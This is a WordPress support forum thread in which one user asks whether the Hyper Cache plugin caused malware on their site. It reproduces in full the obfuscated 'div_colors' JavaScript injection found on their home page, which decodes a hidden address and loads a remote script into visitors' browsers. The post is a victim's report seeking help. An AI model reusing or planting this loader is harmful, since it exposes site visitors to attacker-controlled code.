Title: [Plugin: Hyper Cache]  infected?
Last modified: August 19, 2016

---

# [Plugin: Hyper Cache] infected?

 *  [cspg](https://wordpress.org/support/users/cspg/)
 * (@cspg)
 * [15 years, 2 months ago](https://wordpress.org/support/topic/plugin-hyper-cache-infected/)
 * i am running wp 3.1 with db-cache and hyper cache (current version)
    is hyper
   cache prone to hacking or mallware injection? cause after using it for 2 weeks
   i found in my home page this code inserted:
 * <script type=”text/javascript”>if (typeof(redef_colors)==”undefined”) { var div_colors
   = new Array(‘#4b8272’, ‘#81787f’, ‘#832f83’, ‘#887f74’, ‘#4c3183’, ‘#748783’,‘#
   3e7970’, ‘#857082’, ‘#728178’, ‘#7f8331’, ‘#2f8281’, ‘#724c31’, ‘#778383’, ‘#
   7f493e’, ‘#3e4745’, ‘#3d4444’, ‘#3d4043’, ‘#3f3d41’, ‘#3f423e’, ‘#79823e’, ‘#
   798084’, ‘#748188’, ‘#3d7c78’, ‘#7d3d7f’, ‘#777f31’, ‘#4d0000’); var redef_colors
   = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = “”;for(
   j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i<7;i++) {var c_clr = c_rgb.substr(
   i++,2);if (c_clr!=”00″) s += String.fromCharCode(parseInt(c_clr,16)-15);}}if (
   styled) {s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(
   0,1)+new Date().getTime() + s.substr((s.length-2));} else {s = s.substr(36,(s.
   length-38)) + div_colors[1].substr(0,1)+new Date().getTime();}return s; } function
   try_pick_colors() {try { if(!document.getElementById || !document.createElement){
   document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.
   createElement(“script”);new_cstyle.type=”text/javascript”;new_cstyle.src=div_pick_colors(
   div_colors,0);document.getElementsByTagName(“head”)[0].appendChild(new_cstyle);}}
   catch(e) { }try {check_colors_picked();} catch(e) { setTimeout(“try_pick_colors()”,
   500);} } try_pick_colors();}</script>
 * after deactivating the hyper cache plugin, the code is gone
 * this is what i found about this code: [http://blog.sucuri.net/2011/03/the-div_colors-malware-update.html#more-1840](http://blog.sucuri.net/2011/03/the-div_colors-malware-update.html#more-1840)
 * i dont know exactly how it is related to hyper cache, so does any one else found
   this problem?
 * PS: on the same server i have also an Oscommerce domain/page, but is not related
   with my wp blog/domain

The topic ‘[Plugin: Hyper Cache] infected?’ is closed to new replies.

 * 0 replies
 * 1 participant
 * Last reply from: [cspg](https://wordpress.org/support/users/cspg/)
 * Last activity: [15 years, 2 months ago](https://wordpress.org/support/topic/plugin-hyper-cache-infected/)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics